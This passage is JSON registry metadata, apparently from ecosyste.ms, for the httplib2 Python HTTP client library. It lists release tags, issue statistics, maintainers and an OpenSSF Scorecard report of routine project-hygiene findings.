0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T00:56:11.963Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.httplib2?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":3335,"html_url":null,"role":null,"created_at":"2026-03-03T08:23:07.853Z","updated_at":"2026-03-03T08:23:07.853Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":2166},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-08-25T05:04:32.337Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":14541799,"name":"www/py-httplib2","ecosystem":"pkgsrc","description":"Comprehensive http client library for Python","homepage":"https://github.com/httplib2/httplib2","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["www","python"],"namespace":"www","versions_count":1,"first_release_published_at":"2026-03-19T06:03:29.000Z","latest_release_published_at":"2026-03-19T06:03:29.000Z","latest_release_number":"0.31.2","last_synced_at":"2026-05-27T10:49:20.129Z","created_at":"2026-05-27T10:49:19.596Z","updated_at":"2026-08-22T01:44:48.500Z","registry_url":"https://pkgsrc.se/www/py-httplib2","install_command":"pkg_add py314-httplib2","documentation_url":"https://pkgsrc.se/www/py-httplib2","metadata":{"pkg_slug":"py-httplib2","pkgbase":"py311-httplib2","machine_arch":"x86_64","opsys":"NetBSD","pkgname_latest":"py311-httplib2-0.31.2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f55